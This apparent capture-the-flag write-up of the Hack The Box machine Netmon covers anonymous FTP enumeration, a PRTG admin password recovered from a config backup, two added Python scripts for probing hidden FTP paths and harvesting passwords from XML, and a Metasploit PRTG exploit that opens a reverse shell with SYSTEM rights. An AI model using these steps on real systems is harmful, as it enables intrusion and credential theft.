roaris opened this issue 6 months ago
The scan reports "Anonymous FTP login allowed (FTP code 230)", so try it.
$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:roaris): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49878|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
I found /Users/Public/Desktop/user.txt, but get with the full remote path failed. Note that no data connection was opened: the error is local, because the ftp client reuses the remote path as the local filename and the directory Users/Public/Desktop does not exist on my machine. Either cd into Desktop first, as below, or pass a flat local name as the second argument (get Users/Public/Desktop/user.txt user.txt).
ftp> get Users/Public/Desktop/user.txt
local: Users/Public/Desktop/user.txt remote: Users/Public/Desktop/user.txt
ftp: Can't access `Users/Public/Desktop/user.txt': No such file or directory
ftp> cd Users/Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49921|)
150 Opening ASCII mode data connection.
100% |*****************************************| 34 0.08 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
/Users/Administrator is not accessible.
ftp> dir Users/Administrator
229 Entering Extended Passive Mode (|||49890|)
550 Access is denied.
Opening port 80 in a browser shows a login page for an application called PRTG Network Monitor. I checked SecLists, but nothing hit:
$ find /usr/share/SecLists -iname *prtg*
A search turned up prtgadmin / prtgadmin as the default credential, so I tried that too, but it didn't work.
Let's look at the FTP side a bit more.
According to https://e-words.jp/w/.lnk%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB.html, .lnk files are Windows shortcut files.
ftp> dir Users/Public/Desktop
229 Entering Extended Passive Mode (|||50103|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1195 PRTG Enterprise Console.lnk
02-02-19 11:18PM 1160 PRTG Network Monitor.lnk
02-23-24 08:09AM 34 user.txt
226 Transfer complete.
Looking through Program Files (x86)/PRTG Network Monitor, there is nothing that leads to a login either.
ftp> dir Program\ Files\ (x86)/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50361|)
125 Data connection already open; Transfer starting.
02-02-19 11:17PM <DIR> 64 bit
02-02-19 11:15PM 1888 activation.dat
02-02-19 11:18PM <DIR> cert
12-14-17 12:40PM 2461696 chartdir51.dll
12-14-17 12:40PM 9077248 ChilkatDelphiXE.dll
12-14-17 12:40PM 2138986 chrome.pak
02-02-19 11:17PM <DIR> Custom Sensors
12-14-17 12:40PM 382464 dbexpmda40.dll
12-14-17 12:40PM 519680 dbexpoda40.dll
12-14-17 12:40PM 377856 dbexpsda40.dll
12-14-17 12:40PM 5681 defaultmaps.xml
12-14-17 12:40PM 12871 defaultmaps_iad.xml
02-13-18 02:08PM 1224 deviceiconlist.txt
02-02-19 11:17PM <DIR> devicetemplates
02-23-24 08:08AM <DIR> dlltemp
02-02-19 11:18PM <DIR> download
12-14-17 12:40PM 6667 ethertype.txt
12-14-17 12:40PM 6218 FlowRules.osr
02-02-19 11:18PM <DIR> helperlibs
12-14-17 12:40PM 9956864 icudt.dll
12-14-17 12:40PM 1665 ipmi_bsd-2.0.txt
02-02-19 11:16PM <DIR> language
12-14-17 12:40PM 3707349 Lb2to3.exe
12-14-17 12:40PM 24978944 libcef.dll
12-14-17 12:40PM 1412096 libeay32.dll
02-02-19 11:17PM <DIR> locales
02-02-19 11:18PM <DIR> lookups
02-16-18 10:03AM 796566 macmanufacturerlist.txt
02-02-19 11:18PM <DIR> MIB
12-14-17 12:40PM 522 Microsoft.VC80.CRT.manifest
12-14-17 12:40PM 421200 msvcp100.dll
12-14-17 12:40PM 770384 msvcr100.dll
12-14-17 12:40PM 630544 msvcr80.dll
12-14-17 12:40PM 12498 netsnmp-license.txt
02-02-19 11:17PM <DIR> Notifications
12-14-17 12:40PM 0 Npgsql.txt
12-14-17 12:40PM 487936 openssl.exe
01-18-18 10:03AM 177152 paelibssh.dll
12-14-17 12:40PM 35088 paesslerchart.dll
12-14-17 12:40PM 1083904 PaesslerSNMP.dll
02-15-18 04:24PM 1074688 PaesslerSNMPWrapper.dll
12-14-17 12:40PM 421160 PaesslerSQLEngine.dll
12-14-17 12:40PM 193832 PaesslerSQLEngineDBX.dll
12-14-17 12:40PM 331536 paesslerVMWareShell.exe
12-14-17 12:40PM 310032 paesslerVMWareShell.vshost.exe
12-14-17 12:40PM 1429 phantomjs-license.bsd
12-14-17 12:40PM 1428 protocol.txt
02-16-18 10:04AM 6379096 PRTG Administrator.exe
02-16-18 10:05AM 12923480 PRTG Enterprise Console.exe
02-16-18 10:04AM 5439576 PRTG GUI Starter.exe
02-02-19 11:17PM <DIR> PRTG Installer Archive
02-16-18 10:05AM 11647576 PRTG Probe.exe
02-16-18 10:05AM 7026776 PRTG Server.exe
02-02-19 11:18PM 2000256 PRTG Setup Log.log
02-02-19 11:17PM <DIR> prtg-installer-for-distribution
12-14-17 12:40PM 300318 prtg.ico
12-14-17 12:40PM 444640 PrtgDllWrapper.exe
02-16-18 10:04AM 2778200 PRTGProbeUpdate.exe
02-16-18 10:04AM 3227224 PrtgRemoteInstall.exe
02-16-18 10:04AM 2782808 PRTGServerUpdate.exe
02-16-18 10:04AM 2104408 PRTG_Chromium_Helper.exe
02-16-18 10:04AM 2264664 PRTG_IE_Helper.exe
02-02-19 11:17PM <DIR> Python34
02-16-18 10:04AM 1012224 RegWrapper.exe
02-02-19 11:17PM <DIR> Sensor System
02-02-19 11:17PM <DIR> snmplibs
02-02-19 11:18PM <DIR> snmptemp
01-18-18 10:03AM 461824 ssh.dll
12-14-17 12:40PM 384512 ssleay32.dll
02-02-19 11:18PM <DIR> themes
02-02-19 11:18PM 1275563 unins000.dat
02-02-19 11:15PM 1498815 unins000.exe
12-14-17 12:40PM 1163024 VimService2005.dll
12-14-17 12:40PM 4312848 VimService2005.XmlSerializers.dll
02-02-19 11:17PM <DIR> webroot
226 Transfer complete.
Searching for "prtg network monitor configuration location" turns up
https://kb.paessler.com/en/topic/89431-how-to-copy-data-files-and-custom-files-from-prtg-data-directory#:~:text=The%20PRTG%20Data%20folder%20by,configuration%20of%20your%20PRTG%20server.
which says:
The PRTG Data folder by default located under "C:\ProgramData\Paessler\PRTG Network Monitor" contains all the monitoring data (logs, historic data, tickets, reports, etc.) as well as the configuration of your PRTG server. The content of this folder must be copied on the new server (in the same folder) if you want to keep this data.
ftp> dir
229 Entering Extended Passive Mode (|||50542|)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
Running dir at the root never lists ProgramData, yet it exists. The directory carries the hidden attribute, and the IIS FTP listing leaves hidden entries out, but CWD and LIST by explicit path still work, so it is worth probing well-known locations by name rather than trusting the listing.
ftp> dir ProgramData/Paessler/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
08-18-23 07:20AM <DIR> Configuration Auto-Backups
02-23-24 08:09AM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
02-23-24 08:09AM <DIR> Logs (Web Server)
02-23-24 08:14AM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
02-23-24 08:50AM 1680940 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
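As an added example (not part of the original notes), here is a small Python ftplib helper that automates the FTP steps above: it parses the IIS MS-DOS style listing, fetches a file by its full remote path without the client-side local-path pitfall, and probes directories such as ProgramData that the listing omits. The function names, the HIDDEN_CANDIDATES list and the anonymous e-mail password are my assumptions, not anything from the page.

```python
"""Anonymous IIS FTP enumeration helper (added example; not from the writeup).

Assumptions, not taken from the page: function names, HIDDEN_CANDIDATES and
the anonymous password string are mine.
"""
import io
import re
from ftplib import FTP, error_perm

# Well-known Windows paths that carry the hidden/system attribute and so do not
# appear in an IIS FTP LIST, although CWD/RETR still reach them (assumed list).
HIDDEN_CANDIDATES = [
    "ProgramData",
    "ProgramData/Paessler/PRTG Network Monitor",
    "Users/Public/Desktop",
    "Users/Administrator",
]

# IIS "MS-DOS style" LIST line, e.g.
#   02-25-19 09:15PM       <DIR>          inetpub
#   02-02-19 11:18PM                 1024 .rnd
_LISTING_RE = re.compile(
    r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+)$"
)


def parse_msdos_listing(lines):
    """Turn LIST output into (name, is_dir, size) tuples; ignores status lines."""
    entries = []
    for line in lines:
        match = _LISTING_RE.match(line.strip())
        if not match:
            continue  # "125 Data connection ..." / "226 Transfer complete." etc.
        _date, _time, kind, name = match.groups()
        is_dir = kind == "<DIR>"
        entries.append((name, is_dir, 0 if is_dir else int(kind)))
    return entries


def list_dir(ftp, path):
    """LIST a directory by absolute or relative path and parse it."""
    lines = []
    ftp.dir(path, lines.append)
    return parse_msdos_listing(lines)


def probe_hidden(ftp, candidates=HIDDEN_CANDIDATES):
    """CWD into each candidate and record the server's verdict.

    IIS answers 550 for both missing and denied paths, so the full reply text
    (e.g. "550 Access is denied.") is kept rather than just the code.
    """
    status = {}
    for path in candidates:
        try:
            ftp.cwd("/" + path)
            status[path] = "ok"
        except error_perm as exc:
            status[path] = str(exc).strip()
    ftp.cwd("/")
    return status


def fetch_bytes(ftp, remote_path):
    """RETR a file by its full remote path and return the bytes.

    The interactive client's `get Users/Public/Desktop/user.txt` fails locally
    because it tries to open a local file under a directory that does not
    exist; addressing the remote path and buffering in memory avoids that.
    """
    buf = io.BytesIO()
    ftp.retrbinary("RETR " + remote_path, buf.write)
    return buf.getvalue()


def enumerate_host(host, user="anonymous", password="anonymous@example.com"):
    """Log in anonymously, list the root and probe the hidden candidates."""
    ftp = FTP(host, timeout=15)
    ftp.login(user, password)
    try:
        root = list_dir(ftp, "/")
        hidden = probe_hidden(ftp)
    finally:
        ftp.quit()
    return root, hidden


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.152"
    root, hidden = enumerate_host(target)
    for name, is_dir, size in root:
        print(f"{('<DIR>' if is_dir else size):>10}  {name}")
    for path, verdict in hidden.items():
        print(f"{path}: {verdict}")
```

Run it as python ftp_enum.py 10.10.10.152; the probe output is what tells you ProgramData is reachable even though the root listing never shows it.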
Download PRTG Configuration.dat, PRTG Configuration.old and PRTG Configuration.old.bak and inspect them. All three are XML files.
Searching for "password" shows that PRTG Configuration.old.bak records prtgadmin's password as PrTg@dmin2018.
However, as the name old.bak suggests, this is a backup of an old configuration, so prtgadmin / PrTg@dmin2018 does not log in.
Since the password looks like it was set in 2018, I tried prtgadmin / PrTg@dmin2019, but that didn't work either.
Writeups say prtgadmin / PrTg@dmin2019 is correct, though...
After resetting the machine, prtgadmin / PrTg@dmin2019 logged in.
That makes no sense at all...
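As an added example, not from the notes or from Paessler, here is a Python scanner that pulls password-like elements out of configuration XML files and reports which values appear only in a backup, so the "old password in .old.bak" situation above is spotted without grepping 1.1 MB files by hand. The embedded sample documents, their element names (dbcredentials, dbuser, dbpassword, the "User:" comment) and the rotated value in the current-config sample are constructed for the demo; the real files are passed by path.

```python
"""Scan PRTG-style configuration XML for credential-bearing elements.

Added example, not from the writeup or from Paessler. The sample documents
and their element names are constructed for the demo; real files are passed
by path on the command line.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Tag names that usually carry a secret; case-insensitive substring match.
SECRET_TAG = re.compile(r"pass(word)?|pwd|secret|token", re.I)

# Constructed sample standing in for "PRTG Configuration.old.bak".
BACKUP_SAMPLE = """<?xml version="1.0"?>
<prtg version="18.1.37.13946">
  <data>
    <dbcredentials>
      <dbuser>prtgadmin</dbuser>
      <dbpassword><!-- User: prtgadmin -->PrTg@dmin2018</dbpassword>
    </dbcredentials>
  </data>
</prtg>
"""

# Constructed sample standing in for the live "PRTG Configuration.dat",
# where the credential has since been rotated to a made-up value.
CURRENT_SAMPLE = BACKUP_SAMPLE.replace("PrTg@dmin2018", "rotated-value-here")


def parse_keep_comments(xml_text):
    """Parse with comments retained (the config annotates values with them)."""
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(xml_text, parser=parser)


def find_secrets(xml_text):
    """Return (path, hint, value) for every element whose tag looks secret-ish.

    The value is the element's own text plus any text following an inline
    comment (ElementTree stores that as the comment's tail); the hint is the
    comment text itself, e.g. "User: prtgadmin".
    """
    root = parse_keep_comments(xml_text)
    hits = []

    def walk(elem, path):
        for child in elem:
            if child.tag is ET.Comment:
                continue
            cpath = f"{path}/{child.tag}"
            if SECRET_TAG.search(child.tag):
                hint = " ".join(
                    c.text.strip() for c in child if c.tag is ET.Comment and c.text
                )
                value = (child.text or "") + "".join(c.tail or "" for c in child)
                hits.append((cpath, hint, value.strip()))
            walk(child, cpath)

    walk(root, root.tag)
    return hits


def stale_values(current_xml, backup_xml):
    """Secrets present in the backup but absent from the current config.

    These are the rotated ones: useless as-is, but a template for guessing
    (the notes' 2018 -> 2019 pattern).
    """
    current = {v for _, _, v in find_secrets(current_xml) if v}
    return {(p, h, v) for p, h, v in find_secrets(backup_xml) if v and v not in current}


if __name__ == "__main__":
    # Usage: python prtg_creds.py "PRTG Configuration.dat" "PRTG Configuration.old.bak"
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            cur = f.read()
        with open(sys.argv[2], encoding="utf-8", errors="replace") as f:
            bak = f.read()
    else:
        cur, bak = CURRENT_SAMPLE, BACKUP_SAMPLE
    for path, hint, value in find_secrets(bak):
        print(f"{path}  [{hint}]  {value}")
    for path, hint, value in stale_values(cur, bak):
        print(f"stale (backup only): {path} [{hint}] {value}")
```

Without arguments it runs on the embedded samples; with the two file paths it compares the live configuration against the backup, which is the check that would have flagged PrTg@dmin2018 as stale before any login attempts.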
Skimming the pages, no flag in particular, but the version is shown as 18.1.37.13946. Searching for "prtg 18.1.37 exploit" turns up a command injection vulnerability (CVE-2018-9276). It is an authenticated issue (an attacker with administrative access to the web console injects OS commands through sensor or notification parameters; Paessler fixed it in 18.2.39), so the prtgadmin credentials recovered above are required. Try exploit/windows/http/prtg_authenticated_rce; its Check column is Yes, so check can be run before exploit to confirm the target is vulnerable.
msf6 > search prtg
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/prtg_authenticated_rce_cve_2023_32781 2023-08-09 excellent Yes PRTG CVE-2023-32781 Authenticated RCE
1 exploit/windows/http/prtg_authenticated_rce 2018-06-25 excellent Yes PRTG Network Monitor Authenticated RCE
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/prtg_authenticated_rce
Typing shell in the Meterpreter session drops into a command shell.
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.10.10.152
RHOSTS => 10.10.10.152
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/http/prtg_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (176198 bytes) to 10.10.10.152
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.152:50022) at 2024-02-23 23:41:35 +0900
meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Locate root.txt and we're done.
C:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Administrator\Desktop
02/23/2024 09:26 AM 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 6,723,411,968 bytes free
https://app.hackthebox.com/machines/Netmon